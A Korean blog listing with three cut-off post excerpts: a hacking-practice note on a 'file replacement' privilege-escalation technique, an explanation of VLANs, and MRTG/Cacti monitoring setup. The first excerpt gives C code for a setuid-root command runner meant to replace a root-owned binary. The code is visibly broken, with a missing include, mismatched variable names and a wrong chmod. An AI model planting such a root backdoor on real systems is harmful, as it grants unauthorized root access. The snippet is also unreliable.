1. 파일교체 기법 - 만약 gcc-c++이 설치되어 있고, 사용권한이 아무에게나 있다면 서버에 들어와서 간단한 스크립트 등을 통해서 컴파일해서 해킹이 가능하다. [+]실습 - gcc-c++ 설치 > dnf -y install gcc-c++ - c파일 만들기 (hack.c) #include main (int argc, char * argv[]){ char ecrc[199]; setuid(0); setgid(0); sprintf(ecec, argv[1]); system(exec); } - gcc hack.c -o hackk - chmod 477 hackk 로 UID를 설정해 줌 - 루트 소유의 755 권한을 가진 파일을 찾아 변경하려고 함(임의) - 변경할 파일을 찾고(ls -l /usr/bin/gs) -..
VLAN 이란?? Virtual Local Area Network 의 약자로 물리적인 배치와 상관없이 논리적으로 LAN을 구성하는 기술 즉, VLAN은 물리적 네트워크를 논리적으로 네트워크 구성 가능하다. 만약, 하나의 스위치에 포트가 1~10 까지 있다고 한다면 위의 그림처럼 물리적 네트워크를 VLAN으로 나눠 사용할 수 있다. [+] VLAN을 사용하는 이유 - 브로드 캐스트 전파를 제어함으로써 스위치 네트워크의 성능 향상 - 한대의 스위치를 통해 다양한 그룹으로 그룹화시킬 수 있다. ex) 부서별로 분리 / 층별로 분리 등등 - 네트워크 분리 및 트래픽 감소가 주된 목적 - 기존 구성도에서 물리적으로 크게 변화를 가하지 않고 네트워크 구조 변경이 가능 [+] VLAN 단점 - 하나의 물리적인 장비에..
0. 들어가기 [모니터링 툴] fortigate, asg cfgmaker --global "workDir": /var/www/mrtg/ --global "Options[ ]:growright,bits" --global "Language: Korean" public@localhost > /etc/mrtg.cfg - sed -n '10,30p' /etc/mrtg.cfg - 외부에서 접속 가능하도록 설정 - 웹에서 localhost/mrtg를 열어 정보가 나오는지 확인 [+] Cacti - RRDtool(Round Robin Database Tool)을 사용하는 MRTG를 사용자에게 친화적으로 만든 도구 - Cacti에서 원하는 타겟 호스트를 add device를 통해서 추가해주면 모니터링 할 수 있는데 타겟..